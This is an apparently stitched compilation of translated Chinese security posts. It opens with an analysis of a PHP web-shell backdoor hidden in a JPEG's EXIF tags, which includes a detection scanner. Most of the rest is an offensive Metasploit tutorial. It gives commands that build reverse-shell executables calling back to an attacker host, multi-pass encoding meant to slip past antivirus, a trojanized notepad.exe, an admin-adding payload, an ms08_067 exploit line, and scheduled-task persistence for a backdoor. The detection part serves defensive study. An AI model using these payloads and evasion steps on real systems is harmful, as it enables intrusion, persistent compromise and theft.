A backdoor hidden in the EXIF data of a JPG image

A few days ago, Peter Gramantik from our research team found a very interesting backdoor on a compromised website. This backdoor did not rely on the usual tricks for hiding its content (such as base64/gzip encoding); instead it hid its data inside the EXIF header of a JPEG image. It used two PHP functions, exif_read_data and preg_replace, to read the EXIF header and execute its contents.

Technical details
The backdoor has two parts. The first part is a call to exif_read_data, which reads the image header, and a call to preg_replace, which executes the content. Here is the code we found on the compromised site:

$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');
preg_replace($exif['Make'],$exif['Model'],'');

By themselves these two functions are harmless. exif_read_data is commonly used to read image metadata, and preg_replace replaces string content. However, preg_replace has a hidden and subtle option: if you pass the "/e" modifier, it will eval() the replacement instead of just searching and replacing.

So when we looked at the bun.jpg file, we found the second part of the backdoor:

ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@
^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^
@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^

The file starts with the usual header, but the "Make" header contains the odd keyword "/.*/e". With that execute modifier in place, preg_replace will run whatever is passed to eval().

This is where things get interesting...

If we keep looking at the EXIF data, we find "eval ( base64_decode" hidden in the "Model" header. Putting the pieces together, we can see what is going on: the attacker reads the Make and Model headers from the EXIF data and passes them to preg_replace. Once we substitute the values of $exif['Make'] and $exif['Model'], we get the final backdoor:


preg_replace("/.*/e", '@ eval ( base64_decode("aWYgKGl ..."));', '');

After decoding, we can see that it executes whatever is supplied in $_POST["zz1"]. The fully decoded backdoor is:

if (isset($_POST["zz1"])) { eval(stripslashes($_POST["zz1"])); }

Hiding the malware
Another interesting point is that although bun.jpg and the other image files were modified, they still loaded and displayed normally. In fact, on these compromised sites, the attacker modified a legitimate image that already existed on the site. This is an unusual way of hiding malware.

Source: freebuf.com
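The payload above only works because preg_replace's /e modifier evaluates the replacement string; that modifier was deprecated in PHP 5.5 and removed in PHP 7.0 (preg_replace_callback is the replacement), but the EXIF-resident payload survives image re-uploads and CDN copies, so it is worth hunting for on its own. The following is an added example, not code from the original post or from Sucuri: a dependency-free Python scanner that walks the JPEG segment list, parses the Exif APP1 TIFF structure to pull out the ASCII Make (0x010F) and Model (0x0110) tags, and flags values that look like a PCRE with an "e" modifier or like PHP code, including PHP hidden inside a base64 literal as in the sample above. The heuristic names, build_test_jpeg and the sample images it produces are constructed for this example.

```python
"""Scan JPEG EXIF Make/Model tags for PHP code (added example, not from the original post)."""
import base64
import binascii
import re
import struct

TAG_MAKE, TAG_MODEL = 0x010F, 0x0110
TYPE_ASCII = 2

# Heuristics (constructed for this example): a delimited regex carrying an 'e'
# modifier, or fragments of PHP that have no business in a camera tag.
SUSPICIOUS = {
    "pcre_e_modifier": re.compile(rb"^\s*/.*/[a-zA-Z]*e[a-zA-Z]*\s*$"),
    "php_eval": re.compile(rb"\beval\s*\("),
    "base64_decode": re.compile(rb"base64_decode"),
    "request_superglobal": re.compile(rb"\$_(?:POST|GET|REQUEST|COOKIE)\b"),
}
B64_LITERAL = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")


def iter_segments(data):
    """Yield (marker, payload) for each JPEG segment after SOI, stopping at SOS."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            break
        marker = data[pos + 1]
        if marker in (0xD8, 0xD9) or 0xD0 <= marker <= 0xD7:  # standalone markers, no length
            pos += 2
            continue
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])  # length includes its own 2 bytes
        yield marker, data[pos + 4:pos + 2 + length]
        if marker == 0xDA:  # entropy-coded image data follows; metadata is behind us
            break
        pos += 2 + length


def read_exif_strings(tiff):
    """Return {tag: bytes} for the ASCII entries of IFD0 in a TIFF blob."""
    endian = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if endian is None:
        raise ValueError("bad TIFF byte order")
    (ifd0,) = struct.unpack(endian + "I", tiff[4:8])
    (count,) = struct.unpack(endian + "H", tiff[ifd0:ifd0 + 2])
    out = {}
    for i in range(count):
        entry = tiff[ifd0 + 2 + 12 * i:ifd0 + 14 + 12 * i]
        tag, typ, n = struct.unpack(endian + "HHI", entry[:8])
        if typ != TYPE_ASCII:
            continue
        if n <= 4:  # values of up to 4 bytes are stored inline in the entry
            value = entry[8:8 + n]
        else:       # otherwise the entry holds an offset from the TIFF header
            (off,) = struct.unpack(endian + "I", entry[8:12])
            value = tiff[off:off + n]
        out[tag] = value.rstrip(b"\x00")
    return out


def match_heuristics(value):
    return [name for name, rx in SUSPICIOUS.items() if rx.search(value)]


def decoded_literals(value):
    """Yield the decoded form of every base64-looking run inside a tag value."""
    for m in B64_LITERAL.finditer(value):
        try:
            yield base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue


def scan_jpeg(data):
    """Return (tag_name, heuristic, value) findings for the Make and Model tags of one JPEG."""
    findings = []
    for marker, payload in iter_segments(data):
        if marker != 0xE1 or not payload.startswith(b"Exif\x00\x00"):
            continue
        strings = read_exif_strings(payload[6:])
        for tag, name in ((TAG_MAKE, "Make"), (TAG_MODEL, "Model")):
            value = strings.get(tag, b"")
            findings += [(name, h, value) for h in match_heuristics(value)]
            for blob in decoded_literals(value):  # look through one layer of base64
                findings += [(name, "decoded:" + h, blob) for h in match_heuristics(blob)]
    return findings


def build_test_jpeg(make, model):
    """Constructed sample: a minimal JPEG carrying only an Exif APP1 with Make and Model."""
    entries, blobs = [], b""
    data_off = 8 + 2 + 12 * 2 + 4  # TIFF header + entry count + two entries + next-IFD pointer
    for tag, text in ((TAG_MAKE, make), (TAG_MODEL, model)):
        value = text + b"\x00"  # EXIF ASCII values are NUL-terminated
        if len(value) <= 4:
            entries.append(struct.pack("<HHI", tag, TYPE_ASCII, len(value)) + value.ljust(4, b"\x00"))
        else:
            entries.append(struct.pack("<HHII", tag, TYPE_ASCII, len(value), data_off + len(blobs)))
            blobs += value
    ifd = struct.pack("<H", len(entries)) + b"".join(entries) + struct.pack("<I", 0)
    tiff = b"II*\x00" + struct.pack("<I", 8) + ifd + blobs
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


def demo():
    """Scan one constructed benign and one constructed malicious sample (the shape seen above)."""
    php = b'if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}'
    malicious = build_test_jpeg(b"/.*/e", b'@ eval ( base64_decode("' + base64.b64encode(php) + b'"))')
    benign = build_test_jpeg(b"Canon", b"Canon EOS 5D Mark II")
    return {"malicious": scan_jpeg(malicious), "benign": scan_jpeg(benign)}


if __name__ == "__main__":
    for label, findings in demo().items():
        print(label, "->", [(tag, rule) for tag, rule, _ in findings] or "clean")
```

The scanner deliberately reads only the tags the backdoor consumes; in a real deployment you would run scan_jpeg over every image under the web root and extend SUSPICIOUS with whatever your PHP files actually pass into preg_replace, and treat any regex-looking Make tag as a finding even if the PHP side has since been removed.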

metasploit -> msfencode: single-pass and multi-pass encoding for AV evasion.

[bash]

root@bt:/# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=31337 R |msfencode -e x86/shikata_ga_nai  -t exe > /var/www/payload2.exe
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=1)
root@bt:/# file /var/www/payload2.exe
/var/www/2.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit

[/bash]

We add the R flag to the msfpayload command line to specify raw output, because we will pipe its output directly into msfencode. We specify the x86/shikata_ga_nai encoder and tell msfencode to send the executable output (-t exe) to /var/www/payload2.exe. Finally, we run a quick check with file to ensure that the resulting file is in fact a Windows executable. The response tells us that it is. Unfortunately, after the payload2.exe file is copied over to the Windows system, AVG detects our encoded payload yet again, as shown.
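The file check above only looks at the first bytes of the output. As an added example (not from the original post or from the Metasploit project), here is a small Python PE header reader that reports the same facts file printed (PE, 32-bit vs 64-bit, GUI vs console) and returns None for anything that is not a loadable PE image, which is the check an analyst wants before feeding a sample to any tool that assumes a valid PE. build_min_pe produces a constructed header-only sample for the demonstration, not a real executable.

```python
"""Describe a PE image the way `file` does (added example, not from the original post)."""
import struct

MACHINE = {0x014C: "Intel 80386 32-bit", 0x8664: "x86-64"}
SUBSYSTEM = {2: "GUI", 3: "console"}
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_DLL = 0x2000


def describe_pe(data):
    """Return a one-line description of a PE image, or None if data is not one.

    Checks the MZ stub, follows e_lfanew to the PE signature, then reads the
    COFF header and the Subsystem field of the optional header.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None  # no DOS header at all
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None  # MZ stub without a PE signature (e.g. a plain DOS program)
    coff = e_lfanew + 4
    machine, _nsections, _stamp, _symptr, _nsyms, opt_size, characteristics = \
        struct.unpack_from("<HHIIIHH", data, coff)
    if not characteristics & IMAGE_FILE_EXECUTABLE_IMAGE:
        return None  # object file or otherwise not a loadable image
    opt = coff + 20
    if opt_size < 70 or opt + opt_size > len(data):
        return None  # optional header too short to hold the Subsystem field
    (magic,) = struct.unpack_from("<H", data, opt)
    fmt = {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, "PE?")
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)  # same offset in PE32 and PE32+
    kind = "DLL" if characteristics & IMAGE_FILE_DLL else "executable"
    return (f"{fmt} {kind} ({SUBSYSTEM.get(subsystem, f'subsystem {subsystem}')}) "
            f"{MACHINE.get(machine, f'machine 0x{machine:04x}')}")


def build_min_pe(machine=0x014C, subsystem=2, dll=False):
    """Constructed sample: DOS header + PE signature + COFF + optional header, no sections."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header directly after the DOS header
    magic, opt_size = (0x20B, 240) if machine == 0x8664 else (0x10B, 224)
    characteristics = IMAGE_FILE_EXECUTABLE_IMAGE | (IMAGE_FILE_DLL if dll else 0)
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, characteristics)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 68, subsystem)
    return bytes(dos) + b"PE\x00\x00" + coff + bytes(opt)


if __name__ == "__main__":
    print(describe_pe(build_min_pe()))                 # PE32 executable (GUI) Intel 80386 32-bit
    print(describe_pe(b"\x7fELF" + bytes(100)))        # None: not a PE image
```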

R: tells msfpayload to output raw data, because it is about to be encoded.
The choice of payload and its parameters needs no explanation. | is a pipe. -e is followed by the msfencode encoder to use, and -t exe is msfencode's output type.

> is followed by the output file path.

That is a single pass of encoding. Multiple passes look like this:

[bash]

root@bt:/opt/framework3/msf3# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /var/www/payload3.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
[*] x86/alpha_upper succeeded with size 921 (iteration=1)
[*] x86/alpha_upper succeeded with size 1911 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1940 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 1969 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1998 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2027 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2056 (iteration=5)
[*] x86/countdown succeeded with size 2074 (iteration=1)
[*] x86/countdown succeeded with size 2092 (iteration=2)
[*] x86/countdown succeeded with size 2110 (iteration=3)
[*] x86/countdown succeeded with size 2128 (iteration=4)
[*] x86/countdown succeeded with size 2146 (iteration=5)
root@bt:/opt/framework3/msf3#

[/bash]

Here we use five counts of shikata_ga_nai, feeding the code in raw format into two counts of alpha_upper encoding, which is then fed to another five counts of shikata_ga_nai, followed by five counts of countdown encoding, before finally directing the output into the desired executable. We are using a total of 17 encoding loops in an attempt to circumvent the antivirus software. And, as you can see in Figure 7-3, we have successfully slipped our payload past the antivirus engine.

Obvious, right? Multi-pass encoding just means encoding several times........ <-- stating the obvious

But make sure that, apart from the final stage that produces the file type you need, every intermediate stage in the pipeline outputs RAW data.

msfpayload outputs raw data with the R argument; msfencode outputs raw data with -t raw.

In the example above, each encoder ran for several rounds; that is controlled with the -c parameter.

Finally, here is msfencode's help output; it describes the parameters in detail.

[bash]

root@bt:~# msfencode -h

Usage: /opt/metasploit/msf3/msfencode <options>

OPTIONS:

-a <opt>  The architecture to encode as
-b <opt>  The list of characters to avoid: '\x00\xff'
-c <opt>  The number of times to encode the data
-d <opt>  Specify the directory in which to look for EXE templates
-e <opt>  The encoder to use
-h        Help banner
-i <opt>  Encode the contents of the supplied file path
-k        Keep template working; run payload in new thread (use with -x)
-l        List available encoders
-m <opt>  Specifies an additional module search path
-n        Dump encoder information
-o <opt>  The output file
-p <opt>  The platform to encode for
-s <opt>  The maximum size of the encoded data
-t <opt>  The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war,psh,psh-net
-v        Increase verbosity
-x <opt>  Specify an alternate executable template

root@bt:~#

[/bash]

Backdooring an EXE file with the Metasploit Framework

Official site: www.metasploit.com

Mostly taken from http://www.linux520.com/ ; thanks to teacher beach for sharing this freely.

http://www.linux520.com/v/l00047/l00047.html
http://www.irongeek.com/videos/msfpayload-msfencoder-metasploit-3-3.swf   Both of these videos are quite useful.
===================
msfpayload   msfencode      msfcli

===================
msfpayload -h

 Usage: /msf3/msfpayload <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecutable|[V]BA|[W]ar>

msfpayload windows/shell/reverse_tcp LHOST=192.168.1.13 LPORT=4455  R |  msfencode  -k -x  notepad.exe -t  exe  -e x86/shikata_ga_nai   -c 5 -o  diy_notepad.exe

msfcli exploit/multi/handler payload=windows/shell/reverse_tcp lhost=192.168.1.13 lport=4455  E

=====================

msfpayload  windows/adduser pass=123123 user=admin x >diy_user_add.exe    generates an executable

chmod +x diy_user_add.exe      add execute permission to the file (the generated file has none by default)

===============
$ msfcli -h
Usage: /msf3/msfcli <exploit_name> <option=value> [mode]

/msf3/msfcli <exploit_name> <payload_name> t(target) o(option)
========================================================

Mode           Description
----           -----------
(H)elp         You're looking at it baby!
(S)ummary      Show information about this module
(O)ptions      Show available options for this module
(A)dvanced     Show available advanced options for this module
(I)DS Evasion  Show available ids evasion options for this module
(P)ayloads     Show available payloads for this module
(T)argets      Show available targets for this exploit module
(AC)tions      Show available actions for this auxiliary module
(C)heck        Run the check routine of the selected module
(E)xecute      Execute the selected module

msfcli windows/smb/ms08_067_netapi payload=windows/shell/bind_tcp target=1 RHOST=192.168.1.13 LPORT=5555

msfpayload, Metasploit's command for generating shellcode

[bash]

root@ieroot:~# msfpayload -h

Usage: /opt/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>

OPTIONS:

-h Help banner
-l List available payloads

root@ieroot:~#

[/bash]

It can generate payloads in many formats, selected with the last argument shown in the usage above.

msfpayload is used much like msfcli.

[bash]

root@ieroot:~# msfpayload windows/x64/vncinject/reverse_tcp o

Name: Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
Module: payload/windows/x64/vncinject/reverse_tcp
Version: 14774, 15548, 14976
Platform: Windows
Arch: x86_64
Needs Admin: No
Total size: 422
Rank: Normal

Provided by:
sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
AUTOVNC   true             yes       Automatically launch VNC viewer if present
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port
VNCHOST   127.0.0.1        yes       The local host to use for the VNC proxy
VNCPORT   5900             yes       The local port to use for the VNC proxy

Description:
Connect back to the attacker (Windows x64), Inject a VNC Dll via a
reflective loader (Windows x64) (staged)
root@ieroot:~#

[/bash]

The rest is self-explanatory. Options are set in the form LHOST=192.168.0.222; a lowercase o shows the options; the output type is chosen with C, J, X and so on.


In addition, msfencode can be used to encode the generated payload (call it a payload or a backdoor, either works).

msfencode -l lists the available encoders

msfencode -h shows the help

msfmap and scheduleme

I have been looking into meterpreter recently and came across msfmap, which is great. There are similar tools, but.........

https://msfmap.googlecode.com/files/MSFMap-v0.1.1.tar.bz2
That is the download link.
How to install?
Find where your MSF lives; on Windows you know your own path. On BT5 it is usually one of
/opt/metasploit/msf3
/pentest/exploits/framework3
Mine is the first one, and most installs should be the same.

Give install.sh execute permission,
then run
./install.sh /opt/metasploit/msf3
to install it into msf3.

Load msfmap with: load msfmap
msfmap is roughly like nmap (actually, quite different).

meterpreter > load msfmap
Loading extension msfmap…success.
meterpreter > msfmap -PN 192.168.0.1/24

Starting MSFMap 0.1.1
MSFMap scan report for 192.168.0.1
Host is up.
Not shown: 99 closed ports
PORT   STATE SERVICE
80/tcp open  http

MSFMap scan report for 192.168.0.100
Host is up.
Not shown: 100 closed ports

MSFMap scan report for 192.168.0.101
Host is up.
Not shown: 99 closed ports
PORT   STATE SERVICE
80/tcp open  http

MSFMap scan report for 192.168.0.103
Host is up.
Not shown: 97 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
6001/tcp open  X11:1

MSFMap scan report for 192.168.0.104
Host is up.
Not shown: 100 closed ports

MSFMap scan report for 192.168.0.105
Host is up.
Not shown: 98 closed ports
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

MSFMap scan report for 192.168.0.107
Host is up.
Not shown: 97 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

MSFMap scan report for 192.168.0.108
Host is up.
Not shown: 97 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

MSFMap scan report for 192.168.0.111
Host is up.
Not shown: 95 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
3389/tcp open  ms-term-serv

MSFMap done: 256 IP address (9 hosts up) scanned in 57.54 seconds

meterpreter >

Since a lot of people use my home broadband, this output is not the point............ please ignore it.

meterpreter > msfmap -h
MSFMap (v0.1.1) Meterpreter Base Port Scanner
Usage: msfmap [Options] {target specification}

OPTIONS:

--top-ports <opt>  Scan <number> most common ports
-PN                Treat all hosts as online -- skip host discovery
-T<0-5>            Set timing template (higher is faster)
-h                 Print this help summary page.
-oN         <opt>  Output scan in normal format to the given filename.
-p          <opt>  Only scan specified ports
-sP                Ping Scan - go no further than determining if host is online
-sS                TCP Syn scan
-sT                TCP Connect() scan
-v                 Increase verbosity level

Of the options above, it seems only the first two work???? All the later ones failed in my tests; I don't know why.
meterpreter > msfmap 192.168.0.100-120  this form works too.
This scanner has some problems and is not very accurate. Until I find a way to load nmap into meterpreter, I am using this for now.
---------------------------------------------------------------------------------------------------------
meterpreter > run scheduleme -h
Scheduleme — provides most common scheduling types used during a pentest
This script can upload a given executable or script and schedule it to be
executed. All scheduled task are run as System so the Meterpreter process
must be System or local admin for local schedules and Administrator for
remote schedules

OPTIONS:

-c  <opt>  Command to execute at the given time. If options for execution needed use double quotes
-d         Daily.
-e  <opt>  Executable or script to upload to target host, will not work with remote schedule
-h         Help menu.
-hr <opt>  Every specified hours 1-23.
-i         Run command imediatly and only once.
-l         When a user logs on.
-m  <opt>  Every specified amount of minutes 1-1439
-o  <opt>  Options for executable when upload method used
-p         Password for account provided.
-r         Remote Schedule. Executable has to be already on remote target
-s         At system startup.
-t  <opt>  Remote system to schedule job.
-u         Username of account with administrative privelages.

run scheduleme -e /root/2222.exe -l

With the -s and -i options I never got a session back.
-l does work.

Uploading a backdoor this way amounts to a permanent session: whenever a user logs on, you get a session back. Extremely handy. Upload one that gets through the firewall and you know the rest.

From: http://hi.baidu.com/67115248/item/085f9cd043b59b58fa576871